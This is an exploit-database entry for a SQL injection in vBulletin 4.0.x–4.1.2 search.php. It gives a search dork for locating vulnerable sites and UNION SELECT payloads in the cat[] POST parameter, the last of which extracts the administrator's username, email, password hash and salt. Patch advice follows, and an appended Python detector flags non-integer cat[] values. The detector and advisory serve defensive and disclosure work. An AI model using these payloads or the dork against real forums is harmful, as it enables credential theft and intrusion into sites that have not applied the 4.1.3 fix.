vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

2011-05-21T00:00:00
ID 1337DAY-ID-16147
Type zdt
Reporter D4rkB1t
Modified 2011-05-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            
[+] Site            : 1337day.com
[+] Support e-mail  : submit[at]1337day.com
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
#[+] Discovered By   : D4rkB1t
#[+] Site            : 1337day.com Inj3ct0r Team
#[+] support e-mail  : [email protected]

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thanks to my friends from Inj3ct0r Team (1337day.com)

--------------------------
#        ~Advice~        #
--------------------------
The vendor has already released a patch in vBulletin 4.1.3.
UPDATE NOW!

Use an HTTP debugger...
Or watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc
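
A detection check for the request shape shown in the exploit section, added here as an example and not part of the original advisory or of vBulletin: it parses URL-encoded POST bodies and flags any cat[] value that is not a plain integer. It assumes group category IDs are numeric; the function names, the "query" field and the sample bodies are constructed for illustration.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl

# Parameter names cat[], cat[0], cat[12], ... after URL-decoding.
CAT_KEY = re.compile(r"cat\[\d*\]")
# Assumption: a legitimate category id is a short run of decimal digits.
VALID_ID = re.compile(r"\d{1,10}")

# Constructed sample bodies: one benign, then the advisory's first payload
# in raw form and in URL-encoded form.
SAMPLE_BODIES = [
    "query=test&cat[0]=3&cat[1]=12",
    "query=test&cat[0]=1) UNION SELECT database()#",
    "query=test&cat%5B0%5D=1%29+UNION+SELECT+database%28%29%23",
]


def suspicious_cat_values(post_body: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs whose cat[] value is not a plain integer."""
    hits = []
    # parse_qsl decodes names and values, so cat%5B0%5D is matched as cat[0].
    for name, value in parse_qsl(post_body):
        if CAT_KEY.fullmatch(name) and not VALID_ID.fullmatch(value):
            hits.append((name, value))
    return hits


def flag_requests(bodies: list[str]) -> list[int]:
    """Return the indexes of request bodies with a non-integer cat[] value."""
    return [i for i, body in enumerate(bodies) if suspicious_cat_values(body)]


if __name__ == "__main__":
    for index in flag_requests(SAMPLE_BODIES):
        print(index, suspicious_cat_values(SAMPLE_BODIES[index]))
```

The same integer-only rule can be enforced as input validation in front of search.php on installations that are still below 4.1.3.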

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936


#  0day.today [2018-03-09]  #